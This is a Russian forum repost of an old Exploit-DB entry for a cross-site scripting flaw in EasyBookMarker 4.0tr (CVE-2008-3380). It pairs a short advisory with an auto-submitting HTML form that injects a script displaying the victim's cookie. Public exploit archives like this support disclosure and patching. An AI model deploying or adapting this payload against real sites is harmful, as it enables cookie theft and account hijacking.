- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32087
- Проверка EDB
-
- Пройдено
- Автор
- DR.CRASH
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-3380
- Дата публикации
- 2008-07-21
Код:
source: https://www.securityfocus.com/bid/30304/info
EasyBookMarker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
EasyBookMarker 4.0tr is vulnerable; other versions may also be affected.
<html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://www.example.com/zomplog/ajaxp_backend.php" method="POST" name="form"> <input type="hidden" name="rs" value=""  <script>alert(document.cookie)</script>"> </form> </body> </html>
- Источник
- www.exploit-db.com